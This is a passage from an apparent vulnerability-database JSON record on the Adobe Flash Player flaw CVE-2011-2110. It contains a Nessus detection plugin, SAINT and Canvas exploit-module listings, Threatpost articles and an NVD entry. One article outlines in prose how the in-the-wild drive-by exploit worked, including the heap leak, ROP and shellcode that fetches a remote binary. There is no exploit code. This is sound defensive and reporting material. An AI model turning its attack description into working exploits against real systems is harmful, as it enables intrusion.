\"CVE-2011-0589\",\n \"CVE-2011-0607\",\n \"CVE-2011-0608\",\n \"CVE-2011-0609\",\n \"CVE-2011-0611\",\n \"CVE-2011-0618\",\n \"CVE-2011-0619\",\n \"CVE-2011-0620\",\n \"CVE-2011-0621\",\n \"CVE-2011-0622\",\n \"CVE-2011-0623\",\n \"CVE-2011-0624\",\n \"CVE-2011-0625\",\n \"CVE-2011-0626\",\n \"CVE-2011-0627\",\n \"CVE-2011-0628\",\n \"CVE-2011-2107\",\n \"CVE-2011-2110\",\n \"CVE-2011-2130\",\n \"CVE-2011-2134\",\n \"CVE-2011-2135\",\n \"CVE-2011-2136\",\n \"CVE-2011-2137\",\n \"CVE-2011-2138\",\n \"CVE-2011-2139\",\n \"CVE-2011-2140\",\n \"CVE-2011-2414\",\n \"CVE-2011-2415\",\n \"CVE-2011-2416\",\n \"CVE-2011-2417\",\n \"CVE-2011-2424\",\n \"CVE-2011-2425\",\n \"CVE-2011-2426\",\n \"CVE-2011-2427\",\n \"CVE-2011-2428\",\n \"CVE-2011-2429\",\n \"CVE-2011-2430\",\n \"CVE-2011-2444\"\n );\n script_bugtraq_id(\n 46186,\n 46188,\n 46189,\n 46190,\n 46191,\n 46192,\n 46193,\n 46194,\n 46195,\n 46196,\n 46197,\n 46202,\n 46282,\n 46283,\n 46860,\n 47314,\n 47806,\n 47807,\n 47808,\n 47809,\n 47810,\n 47811,\n 47812,\n 47813,\n 47814,\n 47815,\n 47847,\n 47961,\n 48107,\n 48268,\n 49073,\n 49074,\n 49075,\n 49076,\n 49077,\n 49079,\n 49080,\n 49081,\n 49082,\n 49083,\n 49084,\n 49085,\n 49086,\n 49186,\n 49710,\n 49714,\n 49715,\n 49716,\n 49717,\n 49718\n );\n script_xref(name:\"GLSA\", value:\"201110-11\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"GLSA-201110-11 : Adobe Flash Player: Multiple vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is affected by the vulnerability described in GLSA-201110-11\n(Adobe Flash Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Flash Player.\n Please review the CVE identifiers and Adobe Security Advisories and\n Bulletins referenced below for details.\n \nImpact :\n\n By enticing a user to open a specially crafted SWF file a remote\n attacker could cause a Denial of Service or the execution of arbitrary\n code with the privileges of the user running the application.\n \nWorkaround :\n\n There is no known workaround at this time.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.adobe.com/support/security/advisories/apsa11-01.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.adobe.com/support/security/advisories/apsa11-02.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.adobe.com/support/security/bulletins/apsb11-02.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.adobe.com/support/security/bulletins/apsb11-12.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.adobe.com/support/security/bulletins/apsb11-13.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.adobe.com/support/security/bulletins/apsb11-21.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.adobe.com/support/security/bulletins/apsb11-26.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security.gentoo.org/glsa/201110-11\");\n script_set_attribute(attribute:\"solution\", value:\n\"All Adobe Flash Player users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-plugins/adobe-flash-10.3.183.10'\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:adobe-flash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-plugins/adobe-flash\", unaffected:make_list(\"ge 10.3.183.10\"), vulnerable:make_list(\"lt 10.3.183.10\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Adobe Flash Player\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2021-07-29T16:40:26", "description": "Added: 08/22/2011 \nCVE: [CVE-2011-2110](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2110>) \nBID: [48268](<http://www.securityfocus.com/bid/48268>) \nOSVDB: [73007](<http://www.osvdb.org/73007>) \n\n\n### Background\n\n[Adobe Flash Player](<http://www.adobe.com/products/flashplayer/>) is a cross-platform browser plug-in providing visual enhancements for web pages. \n\n### Problem\n\nThe Adobe Flash Player ActionScript Engine is vulnerable to an information leak that can be leveraged to execute malicious code. An attacker can construct a malicious SWF file to execute arbitrary code. If the attacker persuades a victim to view a page containing this SWF file, the payload will be executed with the victim's privileges. \n\n### Resolution\n\n[Upgrade](<http://get.adobe.com/flashplayer/>) to Adobe Flash Player 10.3.181.26 or higher. \n\n### References\n\n<http://www.adobe.com/support/security/bulletins/apsb11-18.html> \n\n\n### Limitations\n\nThis exploit has been tested against Adobe Flash Player 10.3.181.14, 10.3.181.22, and 10.3.181.23 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2011-08-22T00:00:00", "type": "saint", "title": "Adobe Flash Player ActionScript Function Arguments Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2110"], "modified": "2011-08-22T00:00:00", "id": "SAINT:F38F79D5210BA3E70E0A383BD0788B49", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/flash_actionscript_function_args", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:59", "description": "Added: 08/22/2011 \nCVE: [CVE-2011-2110](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2110>) \nBID: [48268](<http://www.securityfocus.com/bid/48268>) \nOSVDB: [73007](<http://www.osvdb.org/73007>) \n\n\n### Background\n\n[Adobe Flash Player](<http://www.adobe.com/products/flashplayer/>) is a cross-platform browser plug-in providing visual enhancements for web pages. \n\n### Problem\n\nThe Adobe Flash Player ActionScript Engine is vulnerable to an information leak that can be leveraged to execute malicious code. An attacker can construct a malicious SWF file to execute arbitrary code. If the attacker persuades a victim to view a page containing this SWF file, the payload will be executed with the victim's privileges. \n\n### Resolution\n\n[Upgrade](<http://get.adobe.com/flashplayer/>) to Adobe Flash Player 10.3.181.26 or higher. \n\n### References\n\n<http://www.adobe.com/support/security/bulletins/apsb11-18.html> \n\n\n### Limitations\n\nThis exploit has been tested against Adobe Flash Player 10.3.181.14, 10.3.181.22, and 10.3.181.23 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2011-08-22T00:00:00", "type": "saint", "title": "Adobe Flash Player ActionScript Function Arguments Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-2110"], "modified": "2011-08-22T00:00:00", "id": "SAINT:57B4EC82A14E733E11A2680CDCAD2453", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/flash_actionscript_function_args", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-07-28T14:33:26", "description": "Added: 08/22/2011 \nCVE: [CVE-2011-2110](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2110>) \nBID: [48268](<http://www.securityfocus.com/bid/48268>) \nOSVDB: [73007](<http://www.osvdb.org/73007>) \n\n\n### Background\n\n[Adobe Flash Player](<http://www.adobe.com/products/flashplayer/>) is a cross-platform browser plug-in providing visual enhancements for web pages. \n\n### Problem\n\nThe Adobe Flash Player ActionScript Engine is vulnerable to an information leak that can be leveraged to execute malicious code. An attacker can construct a malicious SWF file to execute arbitrary code. If the attacker persuades a victim to view a page containing this SWF file, the payload will be executed with the victim's privileges. \n\n### Resolution\n\n[Upgrade](<http://get.adobe.com/flashplayer/>) to Adobe Flash Player 10.3.181.26 or higher. \n\n### References\n\n<http://www.adobe.com/support/security/bulletins/apsb11-18.html> \n\n\n### Limitations\n\nThis exploit has been tested against Adobe Flash Player 10.3.181.14, 10.3.181.22, and 10.3.181.23 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2011-08-22T00:00:00", "type": "saint", "title": "Adobe Flash Player ActionScript Function Arguments Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2110"], "modified": "2011-08-22T00:00:00", "id": "SAINT:2005E41D7FC86035CB526B0FFF88EBD8", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/flash_actionscript_function_args", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-26T11:35:50", "description": "Added: 08/22/2011 \nCVE: [CVE-2011-2110](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2110>) \nBID: [48268](<http://www.securityfocus.com/bid/48268>) \nOSVDB: [73007](<http://www.osvdb.org/73007>) \n\n\n### Background\n\n[Adobe Flash Player](<http://www.adobe.com/products/flashplayer/>) is a cross-platform browser plug-in providing visual enhancements for web pages. \n\n### Problem\n\nThe Adobe Flash Player ActionScript Engine is vulnerable to an information leak that can be leveraged to execute malicious code. An attacker can construct a malicious SWF file to execute arbitrary code. If the attacker persuades a victim to view a page containing this SWF file, the payload will be executed with the victim's privileges. \n\n### Resolution\n\n[Upgrade](<http://get.adobe.com/flashplayer/>) to Adobe Flash Player 10.3.181.26 or higher. \n\n### References\n\n<http://www.adobe.com/support/security/bulletins/apsb11-18.html> \n\n\n### Limitations\n\nThis exploit has been tested against Adobe Flash Player 10.3.181.14, 10.3.181.22, and 10.3.181.23 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2011-08-22T00:00:00", "type": "saint", "title": "Adobe Flash Player ActionScript Function Arguments Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2110"], "modified": "2011-08-22T00:00:00", "id": "SAINT:A3C27232437E936F9753EC983855C738", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/flash_actionscript_function_args", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T23:05:23", "description": "[![Flash drive by download](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07061045/flash_anatomy_0_day.jpg)](<https://threatpost.com/attackers-exploiting-critical-flash-bug-drive-download-062011/>)Attackers have begun actively exploiting the [critical Adobe Flash vulnerability](<https://threatpost.com/adobe-patches-critical-bugs-flash-reader-acrobat-061511/>) that Adobe patched last week, using rigged Web pages and phishing techniques to compromise vulnerable machines. The attack code is being hosted on a number of sites around the Web right now, researchers said.\n\nAdobe warned last week when it released a patch for the bug that the vulnerability in Flash can be used for remote code execution, and that\u2019s being proven out right now. [Researchers at Websense](<http://community.websense.com/blogs/securitylabs/archive/2011/06/17/cve-2011-2110-for-adobe-flash-player-being-exploited-in-the-wild.aspx>) have found a number of sites that are rigged with malicious code designed to exploit the Flash vulnerability and the exploit itself is using some rather advanced techniques in order to compromise users\u2019 machines.\n\nThe attack begins as most drive-by download attacks do, with a user visiting a malicious site with a browser running a vulnerable version of Flash. The site loads a malicious Flash file, which contains the exploit for the Flash bug and begins the exploitation chain. From there, the interesting parts kick in.\n\n\u201cThe exploit samples we\u2019ve seen so far use heap information leakage, \nso that it doesn\u2019t have to spray the heap. This is a more advanced \nexploit technique than we usually see but it makes the exploit more \nstable and won\u2019t crash the process, which can easily happen when a heap \nspray is used,\u201d Websense\u2019s Patrik Runald said in a blog post on the attack.\n\n\u201cOnce the vulnerability is triggered, the transfer of execution from \nlegitimate code to malicious code takes place when the stack pointer is \nreplaced with EAX.\u201d\n\nAfter the attack succeeds in compromising the machine\u2019s stack, it then uses return-oriented programming (ROP) techniques in order to find a spot to execute the shellcode. That code then downloads an encrypted binary from a remote server that\u2019s decrypted on the user\u2019s machine and stored. At that point, it\u2019s game over for the user. \n\nAttacks on Flash vulnerabilities via drive-by download have been a favored technique for hackers for some time now, and it seems that the time frame in which they\u2019re beginning to exploit new bugs is being compressed. More and more attacks are popping up within days of the discovery or public disclosure of a new Flash bug, so installing the patches for these vulnerabilities is becoming ever more important.\n", "cvss3": {}, "published": "2011-06-20T08:24:11", "type": "threatpost", "title": "Attackers Exploiting Critical Flash Bug Via Drive-By Download", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2011-2110"], "modified": "2013-04-17T16:34:20", "id": "THREATPOST:5BBDD82E1BCCA9D8615FD3FBFD37A188", "href": "https://threatpost.com/attackers-exploiting-critical-flash-bug-drive-download-062011/75348/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:41", "description": "Attention given to previously unknown or \u201czero day\u201d flaws may be overrated, according to research from Microsoft Corp. \n\nIn an analysis, \u201cZeroing in on Malware Propagation Methods,\u201d Microsoft follows the propagation of malware and how certain forms measure up against other vulnerability exploits. Microsoft examined infections reported by their [Malicious Software Removal Tool](<http://www.microsoft.com/security/pc-security/malware-removal.aspx>) (MSRT), given the tool\u2019s range and its connection to Windows/Microsoft Update.\n\nWhile the intent of Microsoft\u2019s report isn\u2019t to downplay Zero Day exploits, the company does suggest the attention they get is overblown.\n\nLess than 1 percent of the infections reported came from zero-day vulnerabilities, 0.12 percent to be exact. The two vulnerabilities that accounted for most of that 0.12 percent, [CVE-2011-0611](<https://threatpost.com/adobe-flash-bug-being-used-attacks-word-documents-041211/>) and CVE-2011-2110, affected Adobe\u2019s Flash Player.\n\nThe remaining infections were propagated through social engineering, AutoRun exploitation, file infection and password attacks, according to the report.\n\nMalware that relied on user interaction comprised 45 percent of the attacks measured while malware that exploited the system\u2019s AutoRun feature comprised 43 percent, or more than a third of all detections. 26 percent of the attacks came from USB threats and 17 percent from the network, respectively.\n\nSpanning well over 100 pages and drawing upon intelligence from 100+ countries, this year\u2019s Security Intelligence Report evaluated vulnerability disclosures for the first half of 2011, January 1 through June 30.\n\nWhen it comes to older vulnerabilities, the report suggests patch management is key going forward. Ninety percent of the recorded attacks are listed as Update Long Available, according to Vinny Gullotto, the general manager of Microsoft\u2019s Malware Protection Center (MMPC). This means that there had been a security update available for each of the vulnerabilities for at least a year before the recorded infection. While it\u2019s been made clear before that [cybercriminals are consistently targeting old vulnerabilities](<https://threatpost.com/forget-apt-mass-malware-still-big-threat-062011/>), new numbers show its imperative is to keep old products patched.\n", "cvss3": {}, "published": "2011-10-11T17:41:11", "type": "threatpost", "title": "Zero Day Flaws Overvalued Says New Microsoft Report", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2011-0611", "CVE-2011-2110"], "modified": "2013-04-17T16:33:37", "id": "THREATPOST:66AAE48AA5E53AA0EB4A9179456F65FC", "href": "https://threatpost.com/zero-day-flaws-overvalued-says-new-microsoft-report-101111/75737/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:43", "description": "[![ExploitHub](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07064516/exploit_hub.jpg)](<https://threatpost.com/exploithub-offering-bounties-and-residuals-exploits-100411/>)NSS Labs\u2019 announced today that their penetration-testing site, [Exploithub](<https://www.exploithub.com/>), will be offering bounties to researchers for developing exploits for12 high-value vulnerabilities.\n\nExploithub is putting up $4,400 for working exploits against what the company describes as a \u201cdirty dozen\u201d of client-side vulnerabilities. And, in what may be a first in the vulnerability research field, the company is offering the authors the chance to earn residual payments for subsequent use of the vulnerabilities.\n\nLaunched in October of 2010, Exploithub is described as an \u201ciTunes for exploits\u201d \u2013 an easy to use market for penetration testers and IT staff to obtain high quality exploits to use against software they are evaluating. \n\nBut every iTunes needs its music, so NSS has opted to put money on the table to attract talented vulnerability researchers and prime the pump. NSS has identified 12 known vulnerabilities by their Common Vulnerabitiles and Exposures (CVE) numbers. They are: CVE-2011-1256, CVE-2011-1266, CVE-2011-1261, CVE-2011-1262, CVE-2011-1963, CVE-2011-1964, CVE-2011-0094, CVE-2011-0038, CVE-2011-0035, CVE-2010-3346, CVE-2011-2110, and CVE-2011-0628. Each exploit will be worth somewhere between $100 and $500. Ten of the eligible vulnerabilities are in Microsoft\u2019s Internet Explorer browser, with the remaining two being in Adobe Flash.\n\nSubmitted bounty candidates must be client-side remote exploits resulting in code execution, PoC and denial of service does not count, and the exploits under the bounty program cannot currently be available in the Metasploit framework community or other exploit toolkits. The first participant to submit a working exploit wins. \n\n\u201cClient-side exploits are the weapons of choice for modern attacks, including spear phishing and so-called APTs. Security professionals need to catch up,\u201d said Rick Moy, NSS Labs CEO in a statement. \u201cThis program is designed to accelerate the development of testing tools, as well as help researchers do well by doing good.\u201d\n", "cvss3": {}, "published": "2011-10-05T13:11:31", "type": "threatpost", "title": "ExploitHub Offering Bounties \u2013 And Residuals \u2013 for Exploits", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-3346", "CVE-2011-0035", "CVE-2011-0038", "CVE-2011-0094", "CVE-2011-0628", "CVE-2011-1256", "CVE-2011-1261", "CVE-2011-1262", "CVE-2011-1266", "CVE-2011-1963", "CVE-2011-1964", "CVE-2011-2110"], "modified": "2013-04-17T20:07:08", "id": "THREATPOST:B55EB8317F225C33315C24F0621A69F2", "href": "https://threatpost.com/exploithub-offering-bounties-and-residuals-exploits-100411/75718/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "canvas": [{"lastseen": "2021-07-28T14:33:12", "edition": 3, "description": "**Name**| flash_APSB11_18 \n---|--- \n**CVE**| CVE-2011-2110 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| flash_APSB11_18 \n**Notes**| CVE Name: CVE-2011-2110 \nVENDOR: Adobe \nNotes: \nThis is an exploit found in the wild, targeting Windows Flash player versions 10.3.181.23 and earlier. \n \nVersionsAffected: Windows Flash Player versions 10.3.181.23 and earlier \nRepeatability: Infinite \nReferences: ['http://www.adobe.com/support/security/bulletins/apsb11-18.html', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2110', 'http://blogs.technet.com/b/mmpc/archive/2011/07/01/a-technical-analysis-on-the-exploit-for-cve-2011-2110-adobe-flash-player-vulnerability.aspx'] \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2110 \nDate public: 06/14/2011 \n\n", "cvss3": {}, "published": "2011-06-16T23:55:00", "type": "canvas", "title": "Immunity Canvas: FLASH_APSB11_18", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2110"], "modified": "2011-06-16T23:55:00", "id": "FLASH_APSB11_18", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/flash_APSB11_18", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T12:04:23", "description": "Adobe Flash Player before 10.3.181.26 on Windows, Mac OS X, Linux, and Solaris, and 10.3.185.23 and earlier on Android, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, as exploited in the wild in June 2011.", "cvss3": {}, "published": "2011-06-16T23:55:00", "type": "cve", "title": "CVE-2011-2110", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2110"], "modified": "2018-10-30T16:26:00", "cpe": ["cpe:/a:adobe:flash_player:10.1.53.64", "cpe:/a:adobe:flash_player:7.0.19.0", "cpe:/a:adobe:flash_player:9.0.277.0", "cpe:/a:adobe:flash_player:9.0.18d60", "cpe:/a:adobe:flash_player:10.2.152.33", "cpe:/a:adobe:flash_player:10.3.185.23", "cpe:/a:adobe:flash_player:10.0.12.10", "cpe:/a:adobe:flash_player:10.1.52.15", "cpe:/a:adobe:flash_player:7.0.14.0", "cpe:/a:adobe:flash_player:9.0.16", "cpe:/a:adobe:flash_player:10.1.92.10", "cpe:/a:adobe:flash_player:9.0.246.0", "cpe:/a:adobe:flash_player:9.0.45.0", "cpe:/a:adobe:flash_player:9.0", "cpe:/a:adobe:flash_player:7.0.24.0", "cpe:/a:adobe:flash_player:10.2.154.25", "cpe:/a:adobe:flash_player:10.1.52.14.1", "cpe:/a:adobe:flash_player:7.0.69.0", "cpe:/a:adobe:flash_player:10.0.45.2", "cpe:/a:adobe:flash_player:8.0.34.0", "cpe:/a:adobe:flash_player:10.2.157.51", "cpe:/a:adobe:flash_player:7.0.67.0", "cpe:/a:adobe:flash_player:10.1.102.64", "cpe:/a:adobe:flash_player:10.3.181.14", "cpe:/a:adobe:flash_player:9.0.260.0", "cpe:/a:adobe:flash_player:9.0.114.0", "cpe:/a:adobe:flash_player:10.1.82.76", "cpe:/a:adobe:flash_player:10.2.152.32", "cpe:/a:adobe:flash_player:9.0.262.0", "cpe:/a:adobe:flash_player:8.0", "cpe:/a:adobe:flash_player:9.0.31.0", "cpe:/a:adobe:flash_player:7.0.1", "cpe:/a:adobe:flash_player:8.0.39.0", "cpe:/a:adobe:flash_player:9.0.159.0", "cpe:/a:adobe:flash_player:9.0.283.0", "cpe:/a:adobe:flash_player:7.0.66.0", "cpe:/a:adobe:flash_player:10.0.15.3", "cpe:/a:adobe:flash_player:9.0.47.0", "cpe:/a:adobe:flash_player:9.0.20.0", "cpe:/a:adobe:flash_player:9.0.28", "cpe:/a:adobe:flash_player:9.0.31", "cpe:/a:adobe:flash_player:10.2.152", "cpe:/a:adobe:flash_player:10.3.181.23", "cpe:/a:adobe:flash_player:8.0.42.0", "cpe:/a:adobe:flash_player:10.1.85.3", "cpe:/a:adobe:flash_player:8.0.33.0", "cpe:/a:adobe:flash_player:10.3.185.21", "cpe:/a:adobe:flash_player:9.0.152.0", "cpe:/a:adobe:flash_player:10.3.181.16", "cpe:/a:adobe:flash_player:7.0.53.0", "cpe:/a:adobe:flash_player:10.0.22.87", "cpe:/a:adobe:flash_player:10.0.42.34", "cpe:/a:adobe:flash_player:9.0.125.0", "cpe:/a:adobe:flash_player:10.2.159.1", "cpe:/a:adobe:flash_player:9.0.151.0", "cpe:/a:adobe:flash_player:7.0.61.0", "cpe:/a:adobe:flash_player:10.2.154.13", "cpe:/a:adobe:flash_player:10.0.0.584", "cpe:/a:adobe:flash_player:10.0.12.36", "cpe:/a:adobe:flash_player:7.0.25", "cpe:/a:adobe:flash_player:10.2.156.12", "cpe:/a:adobe:flash_player:9.0.115.0", "cpe:/a:adobe:flash_player:7.0.60.0", "cpe:/a:adobe:flash_player:9.0.48.0", "cpe:/a:adobe:flash_player:9.0.20", "cpe:/a:adobe:flash_player:9.0.112.0", "cpe:/a:adobe:flash_player:10.1.106.16", "cpe:/a:adobe:flash_player:7.2", "cpe:/a:adobe:flash_player:9.0.155.0", "cpe:/a:adobe:flash_player:6.0.21.0", "cpe:/a:adobe:flash_player:7.0.63", "cpe:/a:adobe:flash_player:10.1.95.2", "cpe:/a:adobe:flash_player:9.0.124.0", "cpe:/a:adobe:flash_player:10.1.105.6", "cpe:/a:adobe:flash_player:10.0.32.18", "cpe:/a:adobe:flash_player:6.0.79", "cpe:/a:adobe:flash_player:8.0.22.0", "cpe:/a:adobe:flash_player:10.1.95.1", "cpe:/a:adobe:flash_player:8.0.24.0", "cpe:/a:adobe:flash_player:7.0.70.0", "cpe:/a:adobe:flash_player:9.0.28.0", "cpe:/a:adobe:flash_player:7.0.68.0", "cpe:/a:adobe:flash_player:7.0", "cpe:/a:adobe:flash_player:10.1.92.8", "cpe:/a:adobe:flash_player:7.1", "cpe:/a:adobe:flash_player:8.0.35.0", "cpe:/a:adobe:flash_player:7.1.1", "cpe:/a:adobe:flash_player:9.125.0", "cpe:/a:adobe:flash_player:7.0.73.0"], "id": "CVE-2011-2110", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-2110", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:10.3.185.23:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.277.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.69.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.260.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.68.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.66.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.125.0:*:*:*:*:*:*:*", 